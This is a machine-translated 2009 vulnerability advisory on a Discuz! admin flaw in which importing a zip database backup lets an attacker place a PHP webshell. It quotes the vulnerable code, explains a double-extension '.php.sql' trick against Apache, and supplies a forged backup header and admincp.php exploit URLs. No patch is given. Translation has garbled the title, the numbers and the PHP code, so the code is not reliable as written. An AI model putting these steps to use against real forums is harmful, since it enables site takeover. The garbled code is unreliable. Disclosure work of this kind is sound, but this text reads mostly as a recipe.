Discuz! admindatabase.inc.php get-webshell bug-vulnerability warning-the black bar safety net

2009-06-09T00:00:00
ID MYHACK58:62200923492
Type myhack58
Reporter 佚名
Modified 2009-06-09T00:00:00

Description

author: ring04h team:http://www. 80vul. com

[The vulnerability by ring04h discovery and delivery,thx] Due to Discuz! Admin\database. inc. php in action=importzip extracting zip files,cause you can get a webshell.

An analysis

In file admin\database. inc. php in the code:

..... elseif($operation == 'importzip') {

require_once DISCUZ_ROOT.'admin/zip.func.php'; $unzip = new SimpleUnzip(); $unzip->ReadFile($datafile_server); if($unzip->Count() == 0 || $unzip->GetError(0) != 0 || ! preg_match("/\. sql$/i", $importfile = $unzip->GetName(0))) { cpmsg('database_import_file_illegal', ", 'error'); }

$identify = explode(',', base64_decode(preg_replace("/^# Identify:\s(\w+)./ s", "\\1", substr($unzip->GetData(0), 0, 2 5 6)))); $confirm = ! empty($confirm) ? 1 : 0; if(!$ confirm && $identify[1] != $version) { cpmsg('database_import_confirm', 'admincp. php? action=database&operation=importzip&datafile_server=$datafile_server&importsubmit=yes&confirm=yes', 'form'); }

$sqlfilecount = 0; foreach($unzip->Entries as $entry) { if(preg_match("/\. sql$/i", $entry->Name)) { $fp = fopen('./ forumdata/'.$ backupdir.'/'.$ entry->Name, 'w'); fwrite($fp, $entry->Data); fclose($fp); $sqlfilecount++; } } ......

Note 2 point 1. preg_match("/\. sql$/i", $importfile = $unzip->GetName(0)) can take advantage of apache features such as 081127_k4pFUs3C-1. php. sql such similar file. 2. $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s(\w+)./ s", "\\1", substr($unzip->GetData(0), 0, 2 5 6)))); so pay attention to the file format:[can first backup and then modify the package as zip]

Identify: MTIyNzc1NzEyNSw2LjEuMCxkaXNjdXosbxvsdgl2b2wsmq==

Discuz! Multi-Volume Data Dump Vol. 1

Version: Discuz! 6.1.0

Time: 2008-11-27 1 1:3 8

Type: discuz

Table Prefix: cdb_

II use

Submitted:

<6.0 :admincp. php? action=importzip&datafile_server=./ Annex path/attachment name. zip&importsubmit=yes =6.1 :admincp. php? action=database&operation=importzip&datafile_server=./ Attachment path/name of the attachment. zip&importsubmit=yes&frames=yes

Three patch[fix] Missing